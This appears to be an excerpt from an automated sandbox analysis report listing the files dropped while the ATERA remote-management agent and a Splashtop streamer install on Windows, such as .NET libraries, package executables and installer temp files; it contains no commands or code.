                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FBB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.Mutex.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.CommandLine.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 692c4c.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID178.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADBF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.EnvironmentVariables.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICB4C.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile created: C:\Windows\Temp\unpack\PreVerCheck.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeJump to dropped file
